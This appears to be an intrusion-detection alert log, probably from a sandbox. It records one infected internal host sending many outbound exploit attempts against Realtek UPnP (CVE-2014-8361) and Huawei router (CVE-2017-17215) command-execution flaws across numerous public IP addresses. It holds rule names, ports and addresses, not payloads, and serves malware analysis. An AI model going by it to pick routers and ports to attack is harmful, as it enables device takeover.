                                                07/20/24-23:05:45.079907TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614580252869192.168.2.14117.27.246.191
                                                07/20/24-23:06:14.583817TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5286852869192.168.2.14192.174.164.210
                                                07/20/24-23:05:38.953817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3928037215192.168.2.1441.144.1.130
                                                07/20/24-23:05:58.369730TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24833052869192.168.2.14139.9.84.177
                                                07/20/24-23:05:37.593936TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5801252869192.168.2.14218.210.113.18
                                                07/20/24-23:05:38.594036TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3454052869192.168.2.14139.117.217.229
                                                07/20/24-23:05:33.830838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5344437215192.168.2.14131.78.104.9
                                                07/20/24-23:05:34.662485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3344237215192.168.2.1441.212.223.17
                                                07/20/24-23:06:01.795331TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4575452869192.168.2.14134.166.44.252
                                                07/20/24-23:05:57.132087TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615390452869192.168.2.14222.37.53.103
                                                07/20/24-23:05:57.787088TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3582652869192.168.2.14119.200.79.245
                                                07/20/24-23:06:02.963776TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23323252869192.168.2.14189.213.60.124
                                                07/20/24-23:05:45.359662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5810437215192.168.2.1468.192.14.242
                                                07/20/24-23:06:08.581424TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613539852869192.168.2.14217.36.166.226
                                                07/20/24-23:05:42.131789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4553637215192.168.2.14197.179.141.156
                                                07/20/24-23:05:50.501247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4032037215192.168.2.14197.194.19.18
                                                07/20/24-23:05:56.083085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4063637215192.168.2.14197.75.34.65
                                                07/20/24-23:05:35.582471TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5372652869192.168.2.1427.129.79.40
                                                07/20/24-23:05:38.701210TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614565052869192.168.2.14105.51.193.210
                                                07/20/24-23:06:02.893558TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5962852869192.168.2.14147.97.158.170
                                                07/20/24-23:06:13.638173TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615600852869192.168.2.14101.94.153.21
                                                07/20/24-23:05:57.158457TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614915852869192.168.2.1490.121.47.125
                                                07/20/24-23:06:04.407220TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3306852869192.168.2.14130.191.45.135
                                                07/20/24-23:05:59.080968TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5113452869192.168.2.144.132.146.66
                                                07/20/24-23:05:56.699362TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616011052869192.168.2.14223.229.22.78
                                                07/20/24-23:05:35.736604TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614850052869192.168.2.1414.90.249.72
                                                07/20/24-23:06:01.181584TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4245852869192.168.2.14135.229.90.34
                                                07/20/24-23:05:58.821284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4467252869192.168.2.1443.139.9.185
                                                07/20/24-23:05:56.137269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5149637215192.168.2.1441.71.243.109
                                                07/20/24-23:06:12.981585TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26090852869192.168.2.14128.90.178.16
                                                07/20/24-23:05:52.472912TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4879852869192.168.2.14161.118.217.155
                                                07/20/24-23:06:00.982926TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3589652869192.168.2.14176.198.224.23
                                                07/20/24-23:05:37.517011TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5130452869192.168.2.14111.192.150.203
                                                07/20/24-23:06:05.879269TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5088452869192.168.2.14179.233.222.192
                                                07/20/24-23:06:00.128631TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25209452869192.168.2.1472.144.78.222
                                                07/20/24-23:06:13.676865TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3306252869192.168.2.1425.111.49.43
                                                07/20/24-23:06:25.391346TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613533252869192.168.2.14168.223.81.132
                                                07/20/24-23:05:57.544809TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613690252869192.168.2.14216.40.246.6
                                                07/20/24-23:05:58.758912TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5729652869192.168.2.14216.255.100.126
                                                07/20/24-23:05:57.560235TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24337652869192.168.2.14191.56.232.70
                                                07/20/24-23:05:58.727364TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615648452869192.168.2.1424.248.92.177
                                                07/20/24-23:05:38.200523TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614301052869192.168.2.1459.44.23.42
                                                07/20/24-23:06:00.954677TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3618052869192.168.2.14173.194.24.204
                                                07/20/24-23:05:47.404229TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3934052869192.168.2.14108.181.93.166
                                                07/20/24-23:06:03.345104TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3869652869192.168.2.14188.244.73.220
                                                07/20/24-23:05:52.635775TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613411652869192.168.2.14220.118.15.248
                                                07/20/24-23:06:01.260147TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5086452869192.168.2.1472.135.129.227
                                                07/20/24-23:05:35.434236TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613474052869192.168.2.14116.132.89.76
                                                07/20/24-23:05:57.791970TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613508452869192.168.2.1464.247.1.200
                                                07/20/24-23:05:57.619304TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615481652869192.168.2.14175.103.230.10
                                                07/20/24-23:05:58.794030TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614866852869192.168.2.14110.201.72.125
                                                07/20/24-23:05:36.327823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5358037215192.168.2.1479.106.105.235
                                                07/20/24-23:05:55.877930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5595037215192.168.2.1425.104.136.33
                                                07/20/24-23:05:39.754007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5803637215192.168.2.1476.23.99.240
                                                07/20/24-23:06:17.539924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5102437215192.168.2.1488.241.207.125
                                                07/20/24-23:05:38.492873TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5061252869192.168.2.14164.11.137.216
                                                07/20/24-23:05:37.601961TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24020652869192.168.2.1438.30.142.71
                                                07/20/24-23:05:35.426258TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615469852869192.168.2.14138.71.112.70
                                                07/20/24-23:05:45.996824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6015237215192.168.2.1485.88.92.181
                                                07/20/24-23:05:46.351281TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6010652869192.168.2.1466.83.14.44
                                                07/20/24-23:06:54.833146TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4306252869192.168.2.1486.230.221.175
                                                07/20/24-23:05:39.677505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4527437215192.168.2.1441.192.38.248
                                                07/20/24-23:06:02.122085TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5318852869192.168.2.14115.181.71.144
                                                07/20/24-23:05:37.445623TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5683852869192.168.2.14135.221.59.240
                                                07/20/24-23:05:46.557507TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5014652869192.168.2.14197.133.121.224
                                                07/20/24-23:05:36.323670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3639037215192.168.2.14157.157.175.235
                                                07/20/24-23:05:37.450149TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4009252869192.168.2.14223.250.141.64
                                                07/20/24-23:05:47.044038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5605437215192.168.2.14157.230.243.7
                                                07/20/24-23:05:42.220682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5752037215192.168.2.14151.75.234.147
                                                07/20/24-23:05:58.709518TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5554052869192.168.2.14167.41.255.218
                                                07/20/24-23:05:47.105578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5507037215192.168.2.1448.16.188.79
                                                07/20/24-23:05:52.701555TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4396052869192.168.2.14110.239.167.97
                                                07/20/24-23:06:08.587454TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615999852869192.168.2.1466.176.206.152
                                                07/20/24-23:05:52.472911TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4589052869192.168.2.14184.100.90.131
                                                07/20/24-23:06:03.429850TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5288052869192.168.2.1480.185.192.112
                                                07/20/24-23:06:03.208973TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4130052869192.168.2.1457.62.122.118
                                                07/20/24-23:06:01.465127TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4358252869192.168.2.14164.43.30.66
                                                07/20/24-23:05:40.458812TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25752852869192.168.2.1458.46.182.160
                                                07/20/24-23:05:50.498027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4925637215192.168.2.14145.150.200.133
                                                07/20/24-23:06:35.070304TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24816052869192.168.2.14125.212.164.174
                                                07/20/24-23:06:58.157771TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24198852869192.168.2.14149.218.131.156
                                                07/20/24-23:06:08.345878TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6077452869192.168.2.14199.65.149.176
                                                07/20/24-23:06:13.770520TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613932252869192.168.2.1440.175.52.158
                                                07/20/24-23:05:52.507639TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6043052869192.168.2.14182.254.22.233
                                                07/20/24-23:05:56.124566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3779037215192.168.2.14197.213.161.97
                                                07/20/24-23:05:37.899491TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615377852869192.168.2.14106.223.167.59
                                                07/20/24-23:06:11.351053TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613483452869192.168.2.142.134.130.207
                                                07/20/24-23:05:37.540434TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3316452869192.168.2.14132.39.168.140
                                                07/20/24-23:05:36.598734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4237037215192.168.2.1441.125.214.40
                                                07/20/24-23:06:03.235312TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23513052869192.168.2.14170.60.139.10
                                                07/20/24-23:05:38.465756TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3373052869192.168.2.14193.5.42.88
                                                07/20/24-23:05:56.285994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3897837215192.168.2.14197.48.27.151
                                                07/20/24-23:05:58.794030TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613318052869192.168.2.14191.34.113.0
                                                07/20/24-23:06:01.399812TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5569452869192.168.2.1420.239.242.93
                                                07/20/24-23:05:48.788274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3628037215192.168.2.14136.34.21.130
                                                07/20/24-23:05:57.164212TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4865452869192.168.2.1460.41.178.30
                                                07/20/24-23:06:15.553063TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5857052869192.168.2.14221.88.192.249
                                                07/20/24-23:06:02.874908TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613383052869192.168.2.14223.138.154.84
                                                07/20/24-23:06:01.850879TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5461652869192.168.2.1473.137.146.119
                                                07/20/24-23:06:16.287042TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616015452869192.168.2.141.136.131.140
                                                07/20/24-23:05:57.584377TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4471652869192.168.2.14196.190.254.156
                                                07/20/24-23:05:48.858199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4617637215192.168.2.14197.84.156.131
                                                07/20/24-23:05:52.513067TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23458652869192.168.2.14207.90.148.106
                                                07/20/24-23:05:40.355569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4449052869192.168.2.1450.25.2.217
                                                07/20/24-23:05:40.326086TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25060452869192.168.2.1469.157.13.224
                                                07/20/24-23:05:48.763323TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5388037215192.168.2.1441.16.128.177
                                                07/20/24-23:05:37.449068TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5532052869192.168.2.14187.189.79.198
                                                07/20/24-23:06:01.318185TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24273252869192.168.2.14129.180.128.160
                                                07/20/24-23:05:46.397411TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5040452869192.168.2.14105.68.61.194
                                                07/20/24-23:05:52.502632TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4790452869192.168.2.1441.126.157.26
                                                07/20/24-23:05:35.916130TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4131052869192.168.2.142.163.63.233
                                                07/20/24-23:05:36.327822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4176637215192.168.2.14157.199.126.73
                                                07/20/24-23:06:34.098635TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4319052869192.168.2.1485.131.139.189
                                                07/20/24-23:06:04.395456TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5115452869192.168.2.14173.224.217.200
                                                07/20/24-23:05:45.389146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4910437215192.168.2.1499.113.4.189
                                                07/20/24-23:05:50.479091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5066037215192.168.2.14157.25.144.118
                                                07/20/24-23:05:40.453690TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5192852869192.168.2.14204.164.229.194
                                                07/20/24-23:05:59.394049TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4281652869192.168.2.1451.139.183.142
                                                07/20/24-23:06:13.292975TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23446852869192.168.2.14149.232.29.216
                                                07/20/24-23:06:12.712041TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5471652869192.168.2.14207.178.205.35
                                                07/20/24-23:05:33.857328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5504637215192.168.2.1424.82.183.93
                                                07/20/24-23:07:25.723282TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3654652869192.168.2.1471.185.114.186
                                                07/20/24-23:06:32.735165TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5536452869192.168.2.1457.38.35.10
                                                07/20/24-23:05:52.594252TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5387052869192.168.2.1480.197.100.180
                                                07/20/24-23:06:38.250934TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613721452869192.168.2.1483.6.1.240
                                                07/20/24-23:06:06.729623TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615414652869192.168.2.14205.68.5.52
                                                07/20/24-23:05:56.894939TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615570452869192.168.2.14155.244.161.196
                                                07/20/24-23:05:33.859779TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5658237215192.168.2.14157.14.174.37
                                                07/20/24-23:06:15.063003TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613724052869192.168.2.14164.79.126.181
                                                07/20/24-23:05:36.574960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5375237215192.168.2.1441.22.186.127
                                                07/20/24-23:05:57.029235TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5144652869192.168.2.14136.62.141.53
                                                07/20/24-23:05:42.180899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5622837215192.168.2.14197.205.16.75
                                                07/20/24-23:05:38.953643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5147037215192.168.2.14175.191.255.72
                                                07/20/24-23:05:35.463271TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614223252869192.168.2.14154.64.178.0
                                                07/20/24-23:05:47.508612TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615803452869192.168.2.14155.98.10.133
                                                07/20/24-23:06:01.338954TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4964652869192.168.2.14166.26.188.195
                                                07/20/24-23:06:06.402808TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5553052869192.168.2.14100.216.158.55
                                                07/20/24-23:05:58.374852TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615853852869192.168.2.1499.133.17.148
                                                07/20/24-23:05:34.626588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3613437215192.168.2.1441.205.179.211
                                                07/20/24-23:05:48.777005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4247637215192.168.2.1427.238.110.145
                                                07/20/24-23:06:27.780457TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615177652869192.168.2.14179.254.24.143
                                                07/20/24-23:06:07.419849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4916837215192.168.2.14197.218.36.212
                                                07/20/24-23:05:45.649487TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615127652869192.168.2.14133.77.138.223
                                                07/20/24-23:05:57.194696TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614248852869192.168.2.14136.6.40.211
                                                07/20/24-23:06:29.669261TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4174652869192.168.2.14154.174.220.159
                                                07/20/24-23:05:45.409134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3619037215192.168.2.14157.1.152.156
                                                07/20/24-23:05:39.825155TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614669852869192.168.2.1454.177.195.84
                                                07/20/24-23:06:16.285196TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25466252869192.168.2.14216.94.128.112
                                                07/20/24-23:06:00.844262TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613322452869192.168.2.14198.167.28.174
                                                07/20/24-23:06:13.638173TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3990452869192.168.2.1470.179.16.59
                                                07/20/24-23:05:40.348099TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4758252869192.168.2.14103.130.0.226
                                                07/20/24-23:06:04.023969TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3409052869192.168.2.14107.85.16.135
                                                07/20/24-23:05:40.444875TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3933452869192.168.2.1487.25.55.60
                                                07/20/24-23:05:56.048573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6091237215192.168.2.14157.61.127.145
                                                07/20/24-23:05:39.060021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3316437215192.168.2.1441.47.234.152
                                                07/20/24-23:05:57.947146TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6090252869192.168.2.14143.208.19.25
                                                07/20/24-23:06:00.099234TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3717652869192.168.2.14111.159.251.81
                                                07/20/24-23:05:37.985424TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614067252869192.168.2.14119.238.64.83
                                                07/20/24-23:05:59.370742TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23285452869192.168.2.141.65.215.231
                                                07/20/24-23:05:40.467316TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4077652869192.168.2.1449.30.236.251
                                                07/20/24-23:07:04.456849TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4951252869192.168.2.1414.168.71.154
                                                07/20/24-23:05:37.456840TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3397652869192.168.2.1449.132.116.240
                                                07/20/24-23:06:23.323671TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616079252869192.168.2.14173.175.21.134
                                                07/20/24-23:05:56.036527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4919037215192.168.2.1441.106.233.29
                                                07/20/24-23:06:19.828184TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3999052869192.168.2.14216.88.74.6
                                                07/20/24-23:06:02.171459TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614350452869192.168.2.14136.117.105.142
                                                07/20/24-23:06:11.296188TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5922852869192.168.2.14104.196.102.71
                                                07/20/24-23:05:37.489810TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4709252869192.168.2.14173.175.30.8
                                                07/20/24-23:05:45.414465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4240237215192.168.2.14218.24.27.144
                                                07/20/24-23:05:38.971654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3310237215192.168.2.14157.0.49.184
                                                07/20/24-23:06:24.632253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4983852869192.168.2.14150.246.129.82
                                                07/20/24-23:05:33.831807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5336437215192.168.2.1441.142.55.170
                                                07/20/24-23:05:45.253781TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5155852869192.168.2.14109.136.114.158
                                                07/20/24-23:06:15.084045TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4312052869192.168.2.14128.202.250.195
                                                07/20/24-23:05:38.765315TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4102652869192.168.2.1467.132.246.110
